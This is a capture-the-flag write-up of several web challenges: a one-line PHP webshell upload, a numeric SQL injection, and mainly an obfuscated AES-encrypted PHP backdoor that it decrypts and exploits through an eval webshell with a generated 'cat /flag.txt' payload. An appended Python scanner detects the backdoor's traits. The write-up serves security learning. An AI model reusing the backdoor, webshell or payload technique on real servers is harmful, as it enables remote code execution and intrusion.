web
Sign-in
Skipped.
web1
Upload a PHP one-line webshell.
web2
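SQL injection. The injection point is in the message notifications: look for the id parameter. It is a numeric injection, and order by 4 is found directly.
From there, use error-based injection directly.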
web3
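web3 is the only challenge with any difficulty. At first we are given a page saying that the system's code has been modified. A directory scan turns up wwwroot.zip, so we download the system source code directly.
Looking closely at the hint: it says the site was shut down urgently because it had been tampered with, and that the system code was backed up. Without an interactive interface we cannot do anything, so some part of the site must still be up.
Going through all the files, only one file returns a string, so we audit that file directly.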
describedssTest.php

```php
<?php
error_reporting(0);
header('Content-type: text/html; charset=utf-8');
$p8 = '3b7430adaed18facca7b799229138b7b'; // AES key, also compared against md5($_GET['id'])
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';
$v8 = '0329647546905494'; // IV

// Encrypt with AES-128-CBC, prepend the IV, then base64-encode twice.
function e($D, $K) {
    $cipher = 'aes-128-cbc';
    $encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
    $result = base64_encode($GLOBALS['v8'] . $encrypted);
    $result = base64_encode($result);
    return $result;
}

// Reverse of e(): base64-decode twice, drop the IV prefix, then decrypt.
function d($D, $K) {
    $cipher = 'aes-128-cbc';
    $decodedData = base64_decode(base64_decode($D));
    $encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
    $decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
    return $decrypted;
}

$a8 = trim(d($a8, $p8));   // decrypted function name
ob_start();
$a8(trim(d($d8, $p8)));    // call it on the decrypted second blob
$O = ob_get_contents();
ob_end_clean();
echo e($O, $p8);           // the output is returned encrypted
?>
```
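Analyzing the logic carefully, the last few statements are enough to see what happens: $a8 is decrypted first, and it decrypts to assert, which is then called directly on the concatenated argument. We also decrypt $d8, which turns out to be a webshell, and we execute through that webshell directly. Note that eval executes only one layer per call, and that '' has to be escaped with \. Also note that 20241026 has to be MD5-hashed twice to equal 3b7430adaed18facca7b799229138b7b.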
The webshell decrypted from d8

```php
@eval("if(md5(@\$_GET['id'])===\$p8){@eval(trim(d(\$_POST['d'],\$p8)));}")
```
Payload generation

```php
<?php
error_reporting(0);
header('Content-type: text/html; charset=utf-8');
$p8 = '3b7430adaed18facca7b799229138b7b';
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';
$v8 = '0329647546905494';

function e($D, $K) {
    $cipher = 'aes-128-cbc';
    $encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
    $result = base64_encode($GLOBALS['v8'] . $encrypted);
    $result = base64_encode($result);
    return $result;
}

function d($D, $K) {
    $cipher = 'aes-128-cbc';
    $decodedData = base64_decode(base64_decode($D));
    $encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
    $decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
    return $decrypted;
}

// Inner quotes are escaped because the string passes through a nested eval.
$a = "eval ('system(\'cat /flag.txt \');');";
echo $c = e($a, $p8);
?>
```
Decrypting the returned result

```php
<?php
$p8 = '3b7430adaed18facca7b799229138b7b';
$v8 = '0329647546905494';

function d($D, $K) {
    $cipher = 'aes-128-cbc';
    $decodedData = base64_decode(base64_decode($D));
    $encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
    $decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
    return $decrypted;
}

// The argument is the encrypted response body returned by the server.
echo d("TURNeU9UWTBOelUwTmprd05UUTVOREZYVW1wMFpuUTFTblJyV1VGbVV6a3JOa042ZWs4MVQxSnNURWxUWTJoeWVYSlNaRU5GWmxGc2FHOVRVamwyY0hwQ2FXNVVTMEpSTkhoU00wczNXWFk9", $p8);
?>
```
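The manual step of going through every file in the wwwroot.zip backup can be turned into a static triage pass that looks for the traits describedssTest.php shows: nested base64 literals, a decoded layer that starts with another literal from the same file (the IV prefix), a variable used as a function name, and decryption combined with output buffering. This is an added example, not code from the original writeup; the indicator labels, the function names and the sample input (built with a dummy key, IV and ciphertext) are assumptions of the example.

```python
import base64
import re

# Triage heuristics for the backdoor shape analysed above (added example).
STRING_LIT = re.compile(r"""['"]([A-Za-z0-9+/=]{16,})['"]""")
VAR_CALL = re.compile(r"\$\w+\s*\(")   # $a8(...): callee only known at runtime

def decoded_layers(text, max_layers=4):
    """Return the ASCII text recovered after each successive base64 layer."""
    layers = []
    for _ in range(max_layers):
        try:
            text = base64.b64decode(text, validate=True).decode("ascii")
        except ValueError:   # covers binascii.Error and UnicodeDecodeError
            break
        layers.append(text)
    return layers

def scan_php(source):
    """Return the sorted indicator names (hypothetical labels) found in source."""
    hits = set()
    literals = STRING_LIT.findall(source)
    for lit in literals:
        layers = decoded_layers(lit)
        if len(layers) >= 2:
            hits.add("nested-base64-literal")
        # e() prepends the IV before the outer encoding, so a decoded layer that
        # starts with another literal from the same file is a strong signal.
        others = [o for o in literals if o != lit]
        if any(layer.startswith(o) for layer in layers for o in others):
            hits.add("iv-prefixed-blob")
    if VAR_CALL.search(source):
        hits.add("variable-function-call")
    if "openssl_decrypt" in source and "ob_start" in source:
        hits.add("decrypt-and-capture-output")
    return sorted(hits)

def build_sample():
    """Constructed sample with the same shape; key, IV and ciphertext are dummies."""
    iv = "0123456789abcdef"
    body = base64.b64encode(b"\x00" * 16).decode()   # stand-in ciphertext
    blob = base64.b64encode(base64.b64encode((iv + body).encode())).decode()
    return ("<?php $p8 = 'ffffffffffffffffffffffffffffffff'; $v8 = '%s'; $a8 = '%s';\n"
            "$a8 = trim(d($a8, $p8)); ob_start(); $a8('x'); "
            "openssl_decrypt($c, 'aes-128-cbc', $p8, 0, $v8); ?>" % (iv, blob))

BENIGN = "<?php function add($x, $y) { return $x + $y; } echo add(1, 2); ?>"

if __name__ == "__main__":
    print(scan_php(build_sample()), scan_php(BENIGN))
```

Each indicator alone is only a triage signal, since legitimate PHP also calls closures through variables; a file that trips several of them is the one to audit first.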
misc
Log analysis
Just search for { directly.